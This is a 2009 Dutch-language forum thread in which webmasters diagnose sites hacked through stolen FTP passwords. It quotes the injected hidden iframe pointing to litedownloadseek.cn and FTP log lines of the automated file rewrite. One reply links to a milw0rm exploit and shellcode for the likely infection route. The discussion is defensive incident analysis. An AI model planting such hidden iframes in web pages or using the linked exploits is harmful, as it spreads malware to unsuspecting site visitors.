Site gehacked: litedownloadseek.cn

Heb je één hoster of verschillende hosters ? En heb je dit ook op andere computers?

Heb je dit probleem met je websites of met je browser?

_Spuit11

[ Voor 14% gewijzigd door pven op 07-01-2009 20:21 ]

Heb je een beetje meer informatie? Hoeveel sites heb je, waar zijn ze gehost, host je toevallig zelf, maak je gebruik van pakketten ipv zelf geschreven software?

Verder heb ik het wel eens gezien ja Maar dan naar een andere website!

edit: 2 voor mij!

[ Voor 4% gewijzigd door LoBbY_1 op 07-01-2009 20:22 ]

Goed, ik zelf host een boel sites op mijn server.
Na lang zoeken en ploegeren ben ik zo goed als zeker van wat er ongeveer is gebeurd

namelijke dit:
ik heb mijn ftp domein + wachtwoord bij mijn vaders computer bewaard (voor easy file transfers vanuit hem)
hij is besmet door virus en heeft zo het domein + wachtwoord geshared met ???? iemand

Daarna is er een ftp connectie geopend vanuit go.iwoolf.de naar mijn server
die vroeg file list op, en venuit die list pakte hij all index.* bestanden, die downloaden die en probeerde hij
<iframe src="http://litedownloadseek.cn/in.cgi?XXXXXXX" width=1 height=1 style="visibility: hidden"></iframe>
in te zetten, daarna PUT hij ze weer, zie hier onder zoals je ziet is dit een robot
go.iwoolf.de - webmaster [07/Jan/2009:08:40:50 -0000] "GET /var/www/colddot.nl/index.php" 200 384
go.iwoolf.de - webmaster [07/Jan/2009:08:40:51 -0000] "PUT /var/www/colddot.nl/index.php" 200 521
(de XXXXXXX ben ik nog niet helemaal uit, en zou mogelijk een wachtwoord kunnen zijn van mijn vader, vader sterk aangeraden om alle wachtwoorden te veranderen, en zijn sys te formateren)

Hoe op te lossen ? ftp wachtwoord verandere, en virus wat ftp wachtwoord te pakken krijgt veranderen/verwijderen

en helaas zit er niks anders op, dan alle bestanden handmatig (of met een str_replace ofzow iets) te herstellen

Als je toegang hebt tot de ftp log bestanden kan je alle accesed files zien

Mijn server is weer clean en veilig

Groeten

Hi,

Excuse-me to speak english but i only speak french and english...
I've got the same problem like you since yesterday.
Do you use filezilla portable or filezilla or ftpexpert for upload your file on your server ?
I think we have use a similar software and this is the problem origin.
Can you confirm me?

thanks

PS: i got nod32 updated on winXP

Interessant.. Zou Total Commander een plugin hebben die niet helemaal 100% is?

Ik heb een soortgelijk probleem. Welliswaar iets andere codes erin, maar je ziet ook in de FTP logs dat er een bestand wordt gedownload, en 2 seconde later teruggezet wordt. En vervolgens belt een klant dat hij een virusmelding krijgt zodra hij op z'n website komt.

Als het een virus op m'n pc lokaal is, een plugin van total commander, of iets anders.. dan heeft wachtwoord wijzigen geen zin. Ze hebben deze toch ook al te pakken gekregen?

Redlihcs schreef op donderdag 08 januari 2009 @ 10:46:
Do you have any idea what trojan that maybe?

Any of hundreds of thousands. Stealing FTP credentials is one of the most common functionalities in malware these days.

Gamepie56 schreef op donderdag 08 januari 2009 @ 11:01:
Als het een virus op m'n pc lokaal is, een plugin van total commander, of iets anders.. dan heeft wachtwoord wijzigen geen zin. Ze hebben deze toch ook al te pakken gekregen?

Malware vinden, verwijderen en dan je wachtwoorden wijzigen.

Dit heeft in de regel niets met de tools zelf te maken, maar met virussen die wachtwoorden uit het register en *.ini filetjes lezen en opsturen naar hun maker. Bestaan al jáááren, en is ook de voornaamste reden van hacks op websites.
Wel een domme hack, als hij die iframe ondeirn je site had toegevoegd maar verders niets gewijzigd had je het nooit gemerkt, en hadden hun meer kans op verspreiding (de in de iframe geladen pagina staat in de regel vol met browserexploits om het virus te verspreiden onder jouw bezoekers).

Ik heb zelf onlangs een keer meegemaakt dat onderin alle indexen een stuk javascript werd geplaatst

Had niets door tot in de zoekresultaten van google stond dat mijn site mogelijk schadelijke informatie bevatte, waarna ik op dat script stuitte.
Decoded laadde hij via een omweg wat externe scriptfiles in, die wederom middels wat exploits probeerde de mallware verder te verspreiden.

Goede manier van je virus verspreiden. Eventuele bezoekers vertrouwen de site waar zij zich op bevinden en zijn dus minder wantrouwig als er een beveiligingsmelding of scriptfout optreed.

@mistigris
Expect a virus on your pc or another pc where you have stored your passwords. It scanes registers and ini-files for passwords and sends them to their master. Change your other hosts passwords while you sitll can

[ Voor 51% gewijzigd door frickY op 08-01-2009 11:29 ]

weird...

With Filezilla, login/password are not crypted too but (and this is another problem), only a part of the website include in my filezilla are attacked, the other part are clean.
Maybe a network sniffer?

Redlihcs schreef op donderdag 08 januari 2009 @ 11:12:
[...]


Het is geen plugin trouwens hoor. Zit standaard in Total Commander.
Het is trouwens ook geen fout. Wachtwoorden in Total Commander worden niet versleuteld opgeslagen.

Daarom kan je wel een plugin hebben die de passwords steelt
Maar welke versie van TC gebruik je en welke plugins? En wellicht belangrijker, is dit een legale versie.

i post on this forum for get more information and try to know the exact origin

Enkele weken(maanden) terug zelfde gehad met server op m'n werk. Toen aan kunnen tonen dat de wachtwoorden idd uit total commander gehaald waren..

Heb toen nog hier gepost hoe en wat... zal even oude post opzoeken.
Hier mijn post over hoe het bij ons gegaan was.

trinite_t schreef op donderdag 18 december 2008 @ 13:55:

[ Voor 28% gewijzigd door trinite_t op 08-01-2009 12:57 ]

Bij deze in mijn geval meteen bewezen dat de wachtwoorden niet van mijn pc worden gejat. Voor elke website maak ik een nieuw FTP account aan, met een ander wachtwoord, wat voor mij te onthouden is.

Als ik in de FTP logs kijk, zie je dat er ingelogd wordt op het STANDAARD ftp account, en niet op het ftp account waarmee ik inlog.. En van dat standaard account heb ik geen wachtwoorden op m'n pc staan, ik weet ze niet eens..

Als er pakketten gebruikt worden zoals wamp en xamp hebben die standaard FTP accounts aanstaan. Deze moet je er zelf uitslopen.
Misschien komt het probleem daarvanaf?

Trouwens wat het eerste bij me opkwam is dat deze link:

Een reverentie link is. Zodat de gebruiker: cocacola5 geld of iets anders krijgt voor de bezoeken die hij genereert. Misschien kunnen jullie de gebruiker cocacola5 achterhalen?

Ik heb hetzelfde probleem.
Al mijn FTP gegevens zijn gejat, ik heb waarschijnlijk via het wireless van een hotel een of ander virus opelopen, en daar kwam ik te laat achter. Ik eet ook niet meer welk virus het is, en dat ik nu juist wat ik nu graag zou weten. Ik heb het idee dat ze gestolen zijn uit m'n in-windows-opgeslagen ftp-gegevens want ik gebruik vaak even gewoon Explorer om ftp's te updaten ... ik heb eigenlijk al heel lang geen andere FTP-software gebruikt, dus dat moet het haast wel zijn.

Op alle index.php, index.html en index.htm ik het volgende in de body geplaast:


Natuurlijk heb ik meteen alle FTP-password veranderd, en ik ben bezig alle index.* te cleanen (Heeft iemand misschien nog tips behalve Extended Find / Replace in Homesite+ ?

Weet iemand WELK virus (trojan) mijn ftp-gegevens gestolen kan hebben?
Dan kan ik specifieker checken of al mijn computers nu virusvrij zijn, zodat het niet weer gebeurt.

Groeten,
REmko//

Gebruiken jullie versie 6.x ?

Daarvoor is een exploit in de omloop:

http://www.milw0rm.org/exploits/1633

Het komt er op neer dat je een besmet bestand geopend heeft, deze zorgde voor een buffer overflow waardoor je willekeurige shellcode kan uitvoeren.

Voorbeelden van win32 shellcode:

http://www.milw0rm.org/shellcode/win32

@moderator: mag je linken naar exploits en shellcode op deze manier?

De TS heeft het over phpbb en oscommerce... zijn deze aanwezig op alle servers? Zoja, is dit de meest recente versie.

Ook raad ik iedereen aan NIET die link naar cocacola te openen. Deze website bevat mallware en zal je computer meteen besmetten.

Waarschijnlijk heb jij ook deze mallware/trojan/virus opgelopen. Zorg dat je systeem er vanaf komt en pleur die zooi van je webservers af.

Als ik het zo lees zou ik toch een aparte pc gebruiken voor dit, of minimaal vmware installeren en daar een ander OS in installeren(mischien linux). Dan heb je daar tenminste geen spyware en virussen erop.
Dan in de firewall alleen de ip nummers toelaten die echt nodig zijn, indien dit mogelijk is.

[ Voor 18% gewijzigd door jan99999 op 08-04-2009 12:12 ]